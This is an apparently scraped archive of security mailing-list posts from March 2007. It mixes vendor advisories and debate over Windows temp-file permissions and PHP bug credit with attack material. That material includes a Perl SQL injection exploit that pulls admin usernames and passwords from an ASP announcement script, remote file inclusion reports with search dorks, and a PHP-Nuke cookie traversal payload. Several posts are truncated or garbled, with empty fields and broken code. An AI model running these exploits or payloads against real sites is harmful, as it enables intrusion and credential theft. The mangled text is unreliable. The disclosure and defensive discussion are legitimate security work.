wwwpaintboar(newsfile) Remote File Inclusion Vulnerability

2007-03-10 Thread saw_xyz
 wwwpaintboar(newsfile) Remote File Inclusion Vulnerability
 Version : 1.0
 Website URL: http://phpforge.oirac.com/
 Discoved by saw_xyz (sasan)
 [XIII Security Researcher]
 Gr33tZ t0 :Snake
 My Home : www.saw13.com
 fuck ahsyane st an davood [ashy member]
 Vulnerable codeZ is in editor.php
 in line 261 :
 ? include $newsfile; ?
 Ex: script]

Remote File Include In Script Premod SubDog 2

2007-03-10 Thread RaeD Hasadya
By Hasadya Raed

Script : Premod SubDog 2
Dork : Premod SubDog 2

B.Files :

Exploits : 

By Hasadya Raed

Get your free email from http://bsdmail.com

Remote File Include In Script SoftNews Media Group

2007-03-10 Thread RaeD Hasadya
By Hasadya Raed

Script : SoftNews Media Group
Dork : Copyright © 2004,2006 SoftNews Media Group
Greetz : Only To Security Focus 

B.Files : 


By Hasadya Raed

Get your free email from http://bsdmail.com

Pre-open files attack agains locked file

2007-03-10 Thread 3APA3A

Hello lists, hello Roger. It's me again.

Sorry  for  annoyance, but there is one more attack vector with pre-open
files I meant, but forgot to mention. It seems dangerous enough and need
to  be  investigated for different applications. It's theoretical attack
against application relying on mandatory locks.

Attack scenario:

1.  Alice pre-opens some Document and awaits Bob to open it. Document is
safe  to open (text file, video file, business application format, etc).
Also, like in case of Microsoft Word it can be temporary file.
2. Bob opens Document with some Application.
3. Application locks file and reads or writes some data
4. Alice modifies data
5. Application  reads  previously  accessed  data.  Because application
relies on the fact data can not be modified in locked file, this data is
not  validated. It can lead to the problems like buffer overflows and to
ability to modify execution flow / arbitrary code execution.

What  can  be  instead  of  Application? Any application to process user
supplied file which locks this file during processing.

Examples are: Microsoft Office applications, video/audio players, etc. I
expect  huge  number of applications are vulnerable and will be grateful
to  everyone  who  can  help  me  to  find  this kind of vulnerabilities
in-the-wild,  because this kind of vulnerability is not trivial and hard
to catch without source code analysis.

{ , . } |\
+--oQQo-{ ^ }-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /

PHP-Nuke = 8.0 Cookie Manipulation (lang)

2007-03-10 Thread programmer
PHPNuke = 8.0 Cookie Manipulation (lang)

HOMEPAGE: http://phpnuke.org/
VERSION: All version
BUG: Cookie Manipulation (lang) (SQL Injection + Local file include)
AUTHOR: Aleksandar aka sale83

Magic Quotes  = OFF 
PHP-Nuke - Preferences -  Multilingual Options- On (Activate Multilingual 
features?  = YES)

Bug is found in mainfile.php line 327.

// Line 327 Bug is here 
} elseif (isset($lang)) {
include_once(language/lang-.$lang..php); // This can be exploited 
by malicious users: ex: /../../robots.txt%00 Multilingual Options=OFF
$currentlang = $lang; // This can be exploited by malicious users. 
ex:SQL Injection in Top and News Module ($currentlang) Multilingual Options = On
} else {


This flaw is due to an error when handling the lang cookie parameter, which 
could be exploited by malicious users because $lang is not filtered. 

Tested On:
Windows XP
Linux SlackWare 10.2
PHP Version 5.1.4
PHPNuke 8.0 ,7.9,7.6
Magic Quotes = OFF
Firefox  2 + Add N Edit Cookies Add-ons


} elseif (isset($lang)) {
   if (eregi('[A-Za-z]', $lang)) {
  if (file_exists(language/lang-.$lang..php)) {
$currentlang = $lang;
}else {
$currentlang = english;
  }else {
   $currentlang = english;
} else {

Best Regards
Programmer and Web Developer

[ECHO_ADV_68$2007] PMB Services = 3.0.13 Multiple Remote File Inclusion Vulnerability

2007-03-10 Thread erdc
[ECHO_ADV_68$2007] PMB Services = 3.0.13 Multiple Remote File Inclusion 

Author : M.Hasran Addahroni
Date   : March, 9th 2007
Location   : Australia, Sydney
Web: http://advisories.echo.or.id/adv/adv68-K-159-2007.txt
Critical Lvl   : Dangerous

Affected software description:

Application   : PMB Services 
version   : = 3.0.13
Vendor: http://www.sigb.net/
Description :

PMB is a completely free ILS (Integrated Library management System). The domain 
of software for libraries is almost exclusively occupied by proprietary 
We are some librarians, users and developers deploring this state of affairs.

PMB is based on web technology. This is what we sometimes call a 'web-app'.
PMB requires an HTTP server (such as Apache, but this is not an obligation), 
the MySQL database and the PHP language.

The main functions of PMB are :

* Supporting the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small 
* Serials management
* Simple administration procedures that can be handled easily even by the 
library staff...


- Invalid include function at includes/resa_func.inc.php :


// +-+

// © 2002-2004 PMB Services / www.sigb.net [EMAIL PROTECTED] et contributeurs 
(voir www.sigb.net)

// +-+

// $Id: resa_func.inc.php,v 1.49 2006/10/31 07:59:35 touraine37 Exp $



- Invalid include function at includes/bull_info.inc.php :

// +-+
// © 2002-2004 PMB Services / www.sigb.net [EMAIL PROTECTED] et contributeurs 
(voir www.sigb.net)
// +-+
// $Id: bull_info.inc.php,v 1.23 2006/08/29 20:33:32 touraine37 Exp $

// affichage des infos bulletin


- Invalid include function at includes/misc.inc.php :

// +-+
// © 2002-2004 PMB Services / www.sigb.net [EMAIL PROTECTED] et contributeurs 
(voir www.sigb.net)
// +-+
// $Id: misc.inc.php,v 1.46 2006/10/18 17:06:28 dbellamy Exp $

//  fonctions de formatage de chaîne
// reg_diacrit : fonction pour traiter les caractères accentués en recherche 
avec regex

// choix de la classe ? utiliser pour envoi en pdf
if (!$fpdf) {
if ($charset != 'utf-8') $fpdf = 'FPDF'; else $fpdf = 'UFPDF';



- Invalid include function at opac_css/rec_panier.php:

// +-+
// © 2002-2004 PMB Services / www.sigb.net [EMAIL PROTECTED] et contributeurs 
(voir www.sigb.net)
// +-+
// $Id: rec_panier.php,v 1.5 2006/12/10 10:04:10 touraine37 Exp $



- - Invalid include function at opac_css/includes/author_see.inc.php :

// +-+
// © 2002-2004 PMB Services / www.sigb.net [EMAIL PROTECTED] et contributeurs 
(voir www.sigb.net)
// +-+
// $Id: author_see.inc.php,v 1.32 2006/12/29 16:10:04 touraine37 Exp $

// affichage du detail pour un auteur


Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

2007-03-10 Thread Thor (Hammer of God)
Apps utilizing temporary files should always use the TEMP or TMP environment 
variables, not a hard-coded path.  And by default, each user has their own 
temp directory created (in XP/Server it is \Documents and 
Settings\username\Local Settings\temp and in Vista it is 
\Users\username\AppData\Local\Temp) that only they have permissions to 
(with SYSTEM and Administrators, of course).  It's not like there is some 
global Full Control temp directory created by default.


- Original Message - 
From: Roger A. Grimes [EMAIL PROTECTED]

Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Sent: Friday, March 09, 2007 9:42 AM
Subject: RE: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file 
management security issues

So, let me get this. An app storing sensitive data doesn't make its own
temp storage folders in a secure location, and instead relies upon one
of the few folders in Windows that all users have Full Control to, and
this is a Windows problem?  In Linux, if an app uses \tmp, is that a
Linux issue?

Sounds like a developer issue to me.


-Original Message-
From: Tim [mailto:[EMAIL PROTECTED]
Sent: Friday, March 09, 2007 11:20 AM
To: Roger A. Grimes
Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file
management security issues

I find your assessment somewhat short-sighted.  I have conducted code
reviews on several commercial apps which use C:\TEMP in very insecure
ways to store sensitive data.  It seems some of these attacks would be
possible in those situations.

Sure, Windows is already pathetically insecure against an attackers
already on the local system, but this would be yet another attack


[SECURITY] [DSA 1265-1] New Mozilla packages fix several vulnerabilities

2007-03-10 Thread Martin Schulze
Hash: SHA1

- --
Debian Security Advisory DSA 1265-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
March 10th, 2007http://www.debian.org/security/faq
- --

Package: mozilla
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs: CVE-2006-6497 CVE-2006-6498 CVE-2006-6499 CVE-2006-6501
 CVE-2006-6502 CVE-2006-6503 CVE-2006-6505
CERT advisories: VU#263412 VU#405092 VU#427972 VU#428500 VU#447772
 VU#606260 VU#887332
BugTraq ID : 21668

Several security related problems have been discovered in Mozilla and
derived products.  The Common Vulnerabilities and Exposures project
identifies the following vulnerabilities:


Several vulnerabilities in the layout engine allow remote
attackers to cause a denial of service and possibly permit them to
execute arbitrary code. [MFSA 2006-68]


Several vulnerabilities in the JavaScript engine allow remote
attackers to cause a denial of service and possibly permit them to
execute arbitrary code. [MFSA 2006-68]


A bug in the js_dtoa function allows remote attackers to cause a
denial of service. [MFSA 2006-68]


shutdown discovered a vulnerability that allows remote attackers
to gain privileges and install malicious code via the watch
JavaScript function. [MFSA 2006-70]


Steven Michaud discovered a programming bug that allows remote
attackers to cause a denial of service. [MFSA 2006-71]


moz_bug_r_a4 reported that the src attribute of an IMG element
could be used to inject JavaScript code. [MFSA 2006-72]


Georgi Guninski discovered several heap-based buffer overflows
that allow remote attackers to execute arbitrary code. [MFSA 2006-74]

For the stable distribution (sarge) these problems have been fixed in
version 1.7.8-1sarge10.

For the unstable distribution (sid) these problems have been fixed in
version 1.0.7-1 of iceape.

We recommend that you upgrade your Mozilla and Iceape packages.

Upgrade Instructions

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge

  Source archives:

  Size/MD5 checksum: 1125 7bbb0352ba3ac9f97a6349dc5b30830e

  Size/MD5 checksum:   610517 a93a7496c1ee1336de1eabb4ace10a40

  Size/MD5 checksum: 30589520 13c0f0331617748426679e8f2e9f537a

  Alpha architecture:

  Size/MD5 checksum:   172736 2b766929fd8fc52fd2dba54550db816e

  Size/MD5 checksum:   149964 a182e1466f9656f71d16ff2d7ab2571b

  Size/MD5 checksum:   189726 7343cb0178402a4aeb3054e80f0b2d9b

  Size/MD5 checksum:   858650 6ca44187faea0d75dc0c868658e7282d

  Size/MD5 checksum: 1030 f2a4a8b7f0dd9ab8b9a80ec1bd7a9a72

  Size/MD5 checksum: 11535592 2eb72b02028260bb60aa77c17fe657bb

  Size/MD5 checksum:   403522 fe42c78ec1ee7e2292bb03904b3a2471

  Size/MD5 checksum:   158336 e08a92e6530f91204f71d9067f426ff2

  Size/MD5 checksum:  3611380 0a3282afa4806af2be0c170052f3c7d0

Re: PHP Classifieds 7.1 - Remote File Include Vulnerability

2007-03-10 Thread support
This will not work as long as you follow the warning messages during install. 
This can only work with register_globals turned ON. The program warns about 
this both during install AND each time admin logs in.

Re: [Full-disclosure] PHP import_request_variables() arbitrary variable overwrite

2007-03-10 Thread Stefano Di Paola
Hi Stefan,

first of all let me say i come in peace :)

Il giorno sab, 10/03/2007 alle 15.17 +0100, Stefan Esser ha scritto: 
  PHP import_request_variables() arbitrary variable overwrite
   Date  #-1;#-1;   20060307
 I believe all dates in the advisory contain the wrong year...

Oops..Yeh :) thank you, i'll change it on my site:)

  import_request_variables() is not new to vulnerabilities: consider this
  change log entry for 24 Nov 2005, PHP 5.1.
  - Fixed potential GLOBALS overwrite via import_request_variables() and
possible crash and/or memory corruption. (Ilia)

 Taking into account that the vulnerability you describe is fixed in
 Hardened-PHP for years and that there is also a protection against this
 in the Suhosin Extension you can be sure that this NOT a new
 vulnerability (and that you are not the first one who found it...)

ok, this was the real timeline in my research:
day one:  
1. I see import_request_variables and read php manual.
2. I think about overwrite globals (no way).
3. I think about overwriting _SERVER and test it on php 5.1.6 
   (ubuntu)(it works!) 
4. I stop, gotta sleep.

day two: 
1. I search on google for import_request_variables advisories 
   (nothing found)
2. I search on php.net in changeLog for fixes (nothing found).
3. I download php 5.2.1
4. I test my poc on mod_php5 compiled from sources.
5. It works again.
6. Ascii and me write the advisory.

Sorry but  i used (maybe in a bad way) google and vendor site and in
some minutes i didn't find anything about the issue (apart from the 2005
changelog). And as no advisory where out on standard sites, I decided to
send my own research without any other effort knowing if it was known
publicly or in the wild.

I didn't look into other products like hardened php patch or suhosin,
cause they are not php by default.

 For the record, the same vulnerability was reported by me on the
 23.10.2004 at 22:05 in a mail to [EMAIL PROTECTED] (before I added the
 protection to Hardened-PHP)
 At that time the PHP developers considered it NOT A VULNERABILITY.

Sadly enough i've also been told several times that some issue was not a
vulnerability, and later i found some advisory about that from other
researchers, so i can understand you are a bit sad...but we're both
professional and we do know these incidents are part of real world and
Full-Disclosure world.

Anyway it seems that your month of php bugs is getting php developers
more sensitive to all issues...
Maybe there was some misunderstanding between you and dev team and the
core team was less interested in this kind of flaws at that time.

 Well now the PHP developers have commited a fix for this to the PHP CVS,
 crediting you instead of the original reporter (me) 

If there are other credits to be given then let me say that i don't have write 
access to php.net site :).

 and as usual the fix
 is only fixing a part of the problem.
 (Hint: long names like HTTP_POST_VARS do exist...)

did'nt see the fix, and so maybe you should add it to MOPB.

peace :),


 Stefan Esser
 Hardened-PHP Project
Stefano Di Paola
Software  Security Engineer

Web: www.wisec.it

RE: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

2007-03-10 Thread Roger A. Grimes
Two things regarding this ongoing (civil) flame war:

1. I was wrong about most versions of Linux having the same inheritance
behavior as Windows. Dead wrong. And several people have wrote to
correct me. Thank you. The search for truth is more important than my
ego. grin Before I wrote that statement, I dropped into a VM of
knoppix that I had on my desktop to test. It's default umask is 000, and
thus the normal inheritance rules applied. After many people wrote, I
realized I used Foundstone's FSLive distro, which is a variation of
Knoppix, intentionally weakened for the classes we teach.  It goes to
show that one sample finding does not a population make.

2. My bone of contention with the original poster, is not that he's an
idiot. He isn't. I'm objecting to his obscure insecurity scenario that
he uses to start the discussion (i.e. private folder created under a
public folder).

How many of you have intentionally created a private folder underneath a
public folder, where the public folder gave Modify/Change permissions to
the larger group?

It's got to be a small minority, and I'd question why even those people
did it.

I've been a sysadmin for 20 years and never done it. If someone was to
come to me and tell me they were going to do it, I'd caution them
against it. Not because of the poster's original concern, but because on
the onset it looks like bad security policy looking for trouble. I'd
recommend that a separate private folder be created every time.

Where I have seen public folders used with private folders underneath,
the larger group did not have Change/Modify permissions to the parent
public folder. They had Read and List, and  couldn't modify other
people's child folders. That's very common.

The rest of his posting is a NTFS permissions 101 class. we've all been
taught that if you delete and re-create an object in Windows, even with
the same name, it isn't the same object. This applies to files, folders,
groups, users...every Windows object without exception.  No surprise
there. We also know whoever creates the object is the Creator Owner and
gets Full Control. It's why Microsoft added the creator Owner SID so
that we could change the default behavior if we didn't like it.  So, I
don't see the big lesson in his posting.

Now, before I get more people defending the original poster, I think his
exact same argument could be applied to a much more common scenario that
I see all the time, perhaps in 50% of all companies that I have audited.
It is where the Everyone group has Full Control to a public Share.
Unless you intend that anyone in your company can change permissions,
it's a bad thing to do.  And don't start with that Windows makes that
the automatic default...that changed in XP. The default Share permission
is now Read, and the underlying NTFS permission (which wins in a
conflict), has never been Everyone Full Control by default in any
version of Windows since NT 4.0.

I'd rather the poster take the more popular problem I've mentioned in
the paragraph above and make the exact same argument, which is, if you
make a security configuration mistake (because all of these scenarios
are mistakes pure and simple), other users can use a timing attack and
deception to give themselves elevated access to your personal files.  

It's still a valid lesson, but I'm not mentally tripping over a strange
start out assumption.

And in the end, the solution is an easy one:
1. Don't intentionally configure security weaknesses.
2. If you absolutely need to give users the ability to create private
folders under a public folder where users have Modify/Change or Full
Control permissions, you have four easy defenses:
a. Change default inheritance
b. Enable the Deny-Delete files and subfolders permission.
c. Change the Creator Owner SID's default permissions for that
d. Make them separate folders.

*Roger A. Grimes, InfoWorld, Security Columnist 
*CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada...
*Author of Professional Windows Desktop and Server Hardening (Wrox)

Re: [Full-disclosure] PHP import_request_variables() arbitrary variable overwrite

2007-03-10 Thread ascii
Stefan Esser wrote:
 Taking into account that the vulnerability you describe is fixed in
 Hardened-PHP for years and that there is also a protection against this
 in the Suhosin Extension you can be sure that this NOT a new
 vulnerability (and that you are not the first one who found it...)

not being credited is really annoying and i understand your feelings but
it happens, take a look here, this vulnerability was fixed 3, 4 times?

i'm sure i wasn't credited at all but who cares, i just want the bugs
fixed, and i think that this is the spirit of this month

 For the record, the same vulnerability was reported by me on the
 23.10.2004 at 22:05 in a mail to [EMAIL PROTECTED] (before I added the
 protection to Hardened-PHP)
 At that time the PHP developers considered it NOT A VULNERABILITY.

some misunderstanding in the communication between you and php team? it
happens and i'm sad for it but this is not our fault

on 21.10.2004 at 20:12 i called my grandmother but she was sleeping, she
is an old lady and it's normal to fall asleep at that age : )

i think that it's possible that your month of php bugs could have
changed the way php devs look to vulnerabilities (if so the goal is
fully reached) or it could be the full disclosure

i mean: why don't publish something you found in 2004? just post an
advisory of the type i found this, they said NO-NO, this is the bug,
use my products to get protection

 Well now the PHP developers have commited a fix for this to the PHP CVS,
 crediting you instead of the original reporter (me) and as usual the fix
 is only fixing a part of the problem.

umh.. next time publish your findings : ) you will get credit from the
beginning and the bug will be fixed

my feeling is that it's important to fix software, any way is allowed:
if internal disclosure doesn't work i'll post to fd, or post directly
to fd

and while your products are valid and i personally use them my guess is
that it's more important to fix things in php itself as from the
statement you made initiative to improve PHP's security

if there are other things in your products that are not fixed in php why
don't publish them?

 (Hint: long names like HTTP_POST_VARS do exist...)

the just fixed _POST and so on? nice : )

i really appreciate your work with php, keep up with the disclosure!

Francesco 'ascii' Ongaro

ps: add some smiles in your mails or people will get confused about the
tone of your speaking : )

Re: [Full-disclosure] PHP import_request_variables() arbitrary variable overwrite

2007-03-10 Thread Stefan Esser
Hello Stefano,

first of all. I am not angry at you, although my mail might have sounded
so, but at the people that deserve it.

The fault of the PHP Security Response Team is not yours. They are the
ones that give credit to the wrong persons.
Luckily after 2.5 years they fixed that issue (or atleast tried so).

 Anyway it seems that your month of php bugs is getting php developers
 more sensitive to all issues...
 Maybe there was some misunderstanding between you and dev team and the
 core team was less interested in this kind of flaws at that time.
This is the goal of the MOPB. And right now it might look like the MOPB
was already successfull. Unfortunately I have worked together with the
PHP Security Response Team for several years and I know how they react.
They might be active for a little while (especially when the media looks
at them) but when that period of time is over they will continue with
their old habits.

Stefan Esser

F#305;st#305;q Duyuru Scripti Remote Sql #304;njection Exploit

2007-03-10 Thread crazy_king
F#305;st#305;q Duyuru Scripti Remote Sql #304;njection

File : goster.asp
Sql  : -1%20union+all+select+0,kullaniciadi,sifre,3+from+admin
Admin Name + Admin Pass
Admin Menu: yoneticiii/default.asp

Thanks : Ajann , Xoron , ApAci , ErNE , Uyuss , Eno7 , Thehacker , Enjexion

.pl Exploit Code :

#[Script Name: F#305;st#305;q Duyuru Scripti
#[Coded by   : [EMAIL PROTECTED]
#[S.Page : http://www.isikkoyu.com/images/yeni/default.asp

use IO::Socket;
if(@ARGV lt; 1){
[//   F#305;st#305;q Duyuru Scripti Remote Blind SQL Injection Exploit
[//   Usage: exploit.pl [target]
[//   Example: exploit.pl victim.com
[//   Example: exploit.pl victim.com
[//   Vulnamp;Exp : [EMAIL PROTECTED] (k)
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = http://.$server;
$port = 80;
$file = /goster.asp?id=;

print Script lt;DIRgt; : ;
$dir = lt;STDINgt;;
chop ($dir);

if ($dir =~ /exit/){
print -- Exploit Failed[You Are Exited] \n;

if ($dir =~ /\//){}
else {
print -- Exploit Failed[No DIR] \n;

$target = -1%20union+all+select+0,kullaniciadi,sifre,3+from+admin;

$target = $host.$dir.$file.$target;

#Writing data to socket
print + Trying to connect: $server\n;
$socket = IO::Socket::INET-gt;new(Proto =gt; tcp, PeerAddr =gt; $server,
PeerPort =gt; $port) || die \n+ Connection failed...\n;
print $socket GET $target HTTP/1.1\n;
print $socket Host: $server\n;
print $socket Accept: */*\n;
print $socket Connection: close\n\n;
print + Connected!...\n;
while($answer = lt;$socketgt;) {
if ($answer =~ /name=\login\ size=\30\ class=\gray_back\
print + Exploit succeed! Getting admin information.\n;
print +  +\n;
print + Username: $1\n;

if ($answer =~ /name=\password\ size=\30\ class=\gray_back\
print + Password: $1\n;

if ($answer =~ /name=\name\ size=\30\ class=\gray_back\
print + Name: $1\n;

if ($answer =~ /name=\email\ size=\30\ class=\gray_back\ value=\(.*?)
print + Email: $1\n;

if ($answer =~ /name=\address1\ size=\30\ class=\gray_back\
print + Address1: $1\n;

if ($answer =~ /name=\address2\ size=\30\ class=\gray_back\
print + Address1: $1\n;

if ($answer =~ /name=\city\ size=\30\ class=\gray_back\
print + City: $1\n;

if ($answer =~ /name=\postcode\ size=\30\ class=\gray_back\
print + PostCode: $1\n;

if ($answer =~ /name=\county\ size=\30\ class=\gray_back\
print + Country: $1\n;

if ($answer =~ /name=\phone\ size=\30\ class=\gray_back\
print + Phone: $1\n;

if ($answer =~ /name=\iurl\ size=\24\ class=\gray_back\
print + Fax: $1\n;

if ($answer =~ /name=\title\ size=\30\ class=\gray_back\
print + Country: $1\n;

if ($answer =~ /Syntax error/) {
print + Exploit Failed : ( \n;

if ($answer =~ /Internal Server Error/) {
print + Exploit Failed : (  \n;

Security bypass vulnerability in LedgerSMB and SQL-Ledger (fixes released today)

2007-03-10 Thread Chris Travers

Hi all;

George Theall of Tenable Security notified the LedgerSMB core team today 
of an authentication bypass vulnerability allowing full access to the 
administrator interface of LedgerSMB 1.1 and SQL-Ledger 2.x.  The 
problem is caused by the password checking routine failing to enforce a 
password check under certain circumstances.  The user can then create 
accounts or effect denial of service attacks.

This is not related to any previous CVE.

We have coordinated with the SQL-Ledger vendor and today both of us 
released security patches correcting the problem.  SQL-Ledger users who 
can upgrade to 2.6.26 should do so, and LedgerSMB 1.1 or 1.0 users 
should upgrade to 1.1.9.  Users who cannot upgrade should configure 
their web servers to use http authentication for the admin.pl script in 
the main root directory.

Best Wishes,
Chris Travers
fn:Chris Travers
email;internet:[EMAIL PROTECTED]

[ GLSA 200703-10 ] KHTML: Cross-site scripting (XSS) vulnerability

2007-03-10 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200703-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
 Title: KHTML: Cross-site scripting (XSS) vulnerability
  Date: March 10, 2007
  Bugs: #165606
ID: 200703-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


The KHTML component shipped with the KDE libraries is prone to a
cross-site scripting (XSS) vulnerability.


KDE is a feature-rich graphical desktop environment for Linux and
Unix-like Operating Systems. KHTML is the HTML interpreter used in
Konqueror and other parts of KDE.

Affected packages

 Package   /  Vulnerable  / Unaffected
  1  kde-base/kdelibs  3.5.5-r8   = 3.5.5-r8


The KHTML code allows for the execution of JavaScript code located
inside the Title HTML element, a related issue to the Safari error
found by Jose Avila.


When viewing a HTML page that renders unsanitized attacker-supplied
input in the page title, Konqueror and other parts of KDE will execute
arbitrary JavaScript code contained in the page title, allowing for the
theft of browser session data or cookies.


There is no known workaround at this time.


All KDElibs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =kde-base/kdelibs-3.5.5-r8


  [ 1 ] CVE-2007-0537
  [ 2 ] CVE-2007-0478


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:



Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at


Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.


Description: PGP signature

Re: Firekeeper - IDS for Firefox available

2007-03-10 Thread Bob Beck
* Jex [EMAIL PROTECTED] [2007-03-09 13:27]:
 rules similar to Snort ones to describe browser based attack
  All incoming HTTP and HTTPS traffic is scanned with these
 rules. HTTPS and compressed responses are scanned after

So the next snort style overflow/format string/etc bug from all that
string bashing code going on in the ids can now let the attacker
compromise a process with access to my https stream decrypted -
probably on an already convieniently open descriptor. Yeah. Baby.

Web Browers are Bloated Fscking Monsters that are full of bugs

Lets add more code to look for people exploiting the bugs - of
course this code won't have bugs..

Now maybe I'm a little bit radical, but something tells me
we've learned nothing from the past here kids.


Church of the Bloated Spaghetti Monster 
B   S   M- ( I'd Fly but I'm Bloated with too much Spaghetti)
 / | | | | | | | \ 
|  | | | | | | |  |
$ sudo ldd firefox-bin  

StartEnd  Type Open Ref GrpRef Name
  exe  10   0  firefox-bin
07cb5000 27cc7000 rlib 01   0  
0d4fa000 2d4fd000 rlib 01   0  
063ca000 263df000 rlib 02   0  
0a9ec000 2a9f rlib 04   0  /usr/local/lib/libplds4.so.18.0
09f33000 29f37000 rlib 04   0  /usr/local/lib/libplc4.so.18.0
0e7fc000 2e806000 rlib 06   0  /usr/local/lib/libnspr4.so.18.0
0a0c2000 2a17a000 rlib 01   0  
0bc86000 2bcad000 rlib 02   0  
0dc27000 2dc2e000 rlib 03   0  
0a0bb000 2a0bf000 rlib 03   0  
03652000 23657000 rlib 04   0  
0fbcb000 2fbe2000 rlib 05   0  
01d67000 21d7 rlib 02   0  
0b5dd000 2b5ea000 rlib 08   0  
0e5a5000 2e5a9000 rlib 08   0  
0278f000 227c9000 rlib 010   0  
06a54000 26a58000 rlib 011   0  /usr/local/lib/libintl.so.3.0
02437000 22513000 rlib 011   0  /usr/local/lib/libiconv.so.4.0
0bc14000 2bc2 rlib 04   0  /usr/local/lib/libcairo.so.5.0
0ac74000 2ac9 rlib 07   0  
05fcf000 25fdf000 rlib 06   0  
0d0c2000 2d0c7000 rlib 05   0  /usr/local/lib/libglitz.so.2.0
0a5d1000 2a5d8000 rlib 05   0  /usr/local/lib/libpng.so.5.1
06fe5000 26fed000 rlib 05   0  /usr/lib/libz.so.4.1
00035000 20039000 rlib 07   0  /usr/X11R6/lib/libXrender.so.4.1
09d92000 29dde000 rlib 012   0  /usr/X11R6/lib/libX11.so.9.0
07e6b000 27e6f000 rlib 011   0  /usr/X11R6/lib/libXext.so.9.0
03b3e000 23b45000 rlib 012   0  /usr/lib/libm.so.2.3
0ecae000 2ecd4000 rlib 01   0  /usr/lib/libstdc++.so.42.0
0704c000 2708 rlib 05   0  /usr/lib/libc.so.40.3
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02384000 22388000 rlib 04   0  /usr/X11R6/lib/libSM.so.8.0
0f8dc000 2f8e3000 rlib 05   0  /usr/X11R6/lib/libICE.so.8.1
0dd4d000 2dd5 rlib 02   0  /usr/X11R6/lib/libXrandr.so.5.0
05396000 2539a000 rlib 02   0  /usr/X11R6/lib/libXi.so.9.0
0eb0e000 2eb12000 rlib 02   0  /usr/X11R6/lib/libXinerama.so.4.0
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0a9a9000 2a9ac000 rlib 03   0  /usr/X11R6/lib/libXfixes.so.4.0
02114000 2211d000 rlib 01   0  /usr/X11R6/lib/libexpat.so.5.0
0afd9000 0afd9000 rtld 01   0  /usr/libexec/ld.so